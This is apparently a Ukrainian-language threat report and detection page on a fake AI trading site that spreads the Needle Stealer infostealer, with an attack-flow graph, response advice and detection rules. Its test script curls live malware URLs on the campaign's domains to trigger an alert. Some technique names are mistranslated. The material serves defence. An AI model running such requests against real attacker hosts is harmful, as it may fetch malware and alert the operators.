Підроблений торговий сайт встановлює шкідливе ПЗ, що захоплює браузери
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
Шахрайський веб-сайт, що рекламує торгового помічника на базі ШІ, використовується для поширення інфостілера Needle Stealer. Ланцюг зараження ґрунтується на викраданні DLL і підміні процесів для введення шкідливого ПЗ у RegAsm.exe, що допомагає йому зливатися з легітимною системною активністю. Коли стілер активний, він збирає дані браузера, націлюється на інформацію про криптовалютні гаманці, а також може розгортати шкідливі розширення браузера для глибшого ущільнення компрометації. Зв’язок з інфраструктурою, контрольованою зловмисниками, здійснюється за допомогою кількох HTTP API точок.
Розслідування
Дослідники простежили шлях інфікування до ZIP-архіву, завантаженого з tradingclaw.pro, який містив завантажувач DLL під назвою iviewers.dll. Цей завантажувач скинув DLL другої стадії, який підмінив RegAsm.exe та запустив Needle Stealer на базі Golang. Подальший аналіз показав, що стілер вилучив приховані ZIP-архіви, які містять шкідливі розширення браузера разом із конфігураційним файлом, що визначав його командно-контрольні сервери.
Запобігання
Користувачам слід уникати завантаження програмного забезпечення з ненадійних сайтів та завжди перевіряти підписи видавців перед запуском будь-якого інсталятора. Командам безпеки варто регулярно перевіряти встановлені розширення браузера та видаляти ті, що видаються неавторизованими або підозрілими. Слід налаштувати моніторинг мережі для виявлення трафіку на відомі шкідливі домени та IP-адреси, пов’язані з кампанією. Інструменти захисту кінцевого пункту мають бути налаштовані на виявлення поведінки викрадення DLL та технік підміни процесів.
Відповідь
Захисникам варто переглянути телеметрію кінцевих точок на предмет виконання iviewers.dll та ознак ін’єкції у RegAsm.exe. Визначені командно-контрольні домени та IP-адреси слід заблокувати на рівні брандмауера або проксі. Командам безпеки слід ізолювати файли, що відповідають звітним хешам або назвам файлів, видалити підозрілі розширення з %LOCALAPPDATA%PackagesExtensions, та скинути облікові записи, пов’язані з компрометованими обліковими записами. Також потрібно перевірити можливі компрометовані криптовалютні гаманці на наявність несанкціонованих дій.
"graph TB %% Class definitions classDef action fill:#99ccff classDef malware fill:#ff9999 classDef process fill:#ccccff %% Nodes step_a["<b>Дія</b> – <b>T1659 Впровадження контенту</b><br/>Користувач відвідує зловмисний сайт TradingClaw, щоб отримати шкідливий контент.<br/><b>Опис</b>: Зловмисники впроваджують шкідливий контент у легітимний веб-сайт для доставки корисного навантаження."] class step_a action step_b["<b>Дія</b> – <b>T1204.001 Шкідливе посилання</b><br/>Користувач клікає та завантажує шкідливий архів ZIP.<br/><b>Опис</b>: Користувача обманом заохочують до натискання на шкідливе посилання, яке призводить до завантаження викрадача облікових даних або іншого корисного навантаження."] class step_b action step_c["<b>Дія</b> – декілька технік<br/><b>Mаскування T1036.001</b>: iviewers.dll імітує легітимний файл.<br/><b>Підрив довірчих контролерів T1553.002</b>: обходити довіру шляхом викрадення DLL.<br/><b>Виконання міфічного проксі-бінарного коду T1218</b>: використання системного бінарного коду для виконання.<br/><b>Використання довірених утиліт від розробників T1127</b>: зловживання довіреними утилітами.<br/><b>Відображення завантаження коду T1620</b>: завантаження коду без доступу до диска.<br/><b>Опис</b>: викрадення DLL через iviewers.dll для виконання шкідливого коду."] class step_c action step_d["<b>Впровадження процесу</b> – <b>T1055.012 Порожнистий процес</b><br/>Шкідливий код, впроваджений в процес RegAsm.exe.<br/><b>Опис</b>: Зловмисник створює порожнистий процес і вставляє шкідливий корисний навантаження."] class step_d process step_e["<b>Шкідливе ПЗ</b> – ядро Needle Stealer<br/>Збирає дані жертви після виконання."] class step_e malware step_f["<b>Доступ до облікових даних</b> – <b>T1115 Дані буфера обміну</b><br/>Збирає вміст буфера обміну.<br/><b>Опис</b>: Захоплення даних, скопійованих у буфер обміну, таких як паролі."] class step_f action step_g["<b>Захоплення вводу</b> – <b>T1056 Захоплення вводу</b><br/>Захоплює введення форми.<br/><b>Опис</b>: Запис клавішеї або полів форми для викрадення облікових даних."] class step_g action step_h["<b>Доступ до облікових даних</b> – кілька технік<br/><b>Відкриття інформації про браузер T1217</b>: Проводить інвентаризацію встановлених браузерів.<br/><b>Облікові дані з веб-браузерів T1555.003</b>: Витяговані збережені паролі.<br/><b>Сесійні кукі веб-сайту T1550.004</b>: Читає сесійні кукі.<br/><b>Викрадення веб-сесійного кукі T1539</b>: Експортує кукі.<br/><b>Підробка облікових даних веб-сайту T1606</b>: Створює підроблені облікові дані.<br/><b>Опис</b>: Викрадає дані браузера, облікові дані і кукі."] class step_h action step_i["<b>Збереження</b> – <b>T1176 Програмні розширення</b><br/>Встановлює шкідливе розширення браузера.<br/><b>Опис</b>: Розширення триває у браузері та може змінювати трафік."] class step_i action step_j["<b>Дія</b> – Розширення маніпулює трафіком<br/>Перенаправляє запити, замінює завантаження, вводить скрипти."] class step_j action step_k["<b>Командування та контроль</b> – кілька технік<br/><b>Кодування даних T1132.001</b>: Кодує дані перед ексфільтрацією.<br/><b>Витік через C2 канал T1041</b>: Відправляє дані через C2.<br/><b>Опис</b>: Передає викрадені дані на віддалений сервер."] class step_k action %% Connections step_a –>|веде до| step_b step_b –>|веде до| step_c step_c –>|веде до| step_d step_d –>|веде до| step_e step_e –>|збирає| step_f step_e –>|збирає| step_g step_e –>|збирає| step_h step_e –>|встановлює| step_i step_i –>|дозволяє| step_j step_j –>|поширює| step_k "
Потік атаки
Виявлення
Можлива спроба підключення DLL за допомогою Oleview (через image_load)
Перегляд
Підозріле командування та контроль через незвичайний домен верхнього рівня (TLD) DNS-запит (через dns)
Перегляд
IOCs (HashSha256) для виявлення: Шкідливий торговий веб-сайт, який поширює шкідливе ПЗ, що передає ваш браузер зловмисникам
Перегляд
IOCs (SourceIP) для виявлення: Шкідливий торговий веб-сайт, який поширює шкідливе ПЗ, що передає ваш браузер зловмисникам
Перегляд
IOCs (DestinationIP) для виявлення: Шкідливий торговий веб-сайт, який поширює шкідливе ПЗ, що передає ваш браузер зловмисникам
Перегляд
Виявлення злоякісних TradingClaw і перенаправлення сайтів [Веб-сервер]
Перегляд
Моделювання виконання
Передумова: Проблеми з телеметрією та попередньою шкалою базової перевірки повинні були пройти.
Обґрунтування: Цей розділ деталізує точне виконання техніки супротивника (TTP), призначеної для запуску правила виявлення. Команди та оповідь ПОВИННІ прямо відображати визначені TTP і мають на меті згенерувати точну телеметрію, очікувану логікою виявлення.
-
Наратив атаки та команди:
Супротивник, який отримав шкідливе ПЗ Needle Stealer, хостить його на зловмисному доменіtradingclaw.pro. Зловмисник переконує жертву відкрити шкідливе посилання (наприклад, через фішинговий емейл). Браузер жертви подає HTTP GET-запит наhttp://tradingclaw.pro/stealer.exe, що фіксується логами проксі. Оскільки URL містить точний рядокtradingclaw.pro, умова Sigma правило (url|contains) оцінюється як істинна, генеруючи попередження.Щоб відтворити це в тестовому середовищі, ми виконуємо прямий
запит curlна зловмисний домен. Запит складений так, щоб виглядати як типовий користувацький трафік (стандартний User-Agent, без особливих заголовків), щоб лише збіг доменів активував попередження. -
Скрипт тестування регресії:
#!/usr/bin/env bash # ------------------------------------------------------------ # Симуляція шкідливого доступу для активації правила "Malicious TradingClaw". # ------------------------------------------------------------ set -euo pipefail # Визначте шкідливі URL (точні рядки, використовувані правилом) MALICIOUS_URLS=( "http://tradingclaw.pro/stealer.exe" "https://studypages.com/download/needle.exe" ) for url in "${MALICIOUS_URLS[@]}"; do echo "[*] Запитуємо ${url}" # Використовуйте реалістичний user-agent для імітації браузера curl -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, як Gecko) Chrome/124.0 Safari/537.36" -s -o /dev/null "${url}" done echo "[+] Симуляція завершена." -
Команди очищення:
# Постійні артефакти не створюються запитами curl. # Очистіть кеш DNS, щоб уникнути випадкового повторного використання домену в подальших тестах. if command -v ipconfig >/dev/null 2>&1; then ipconfig /flushdns elif command -v systemd-resolve >/dev/null 2>&1; then systemd-resolve --flush-caches fi echo "[+] Очищення завершено."
Кінець звіту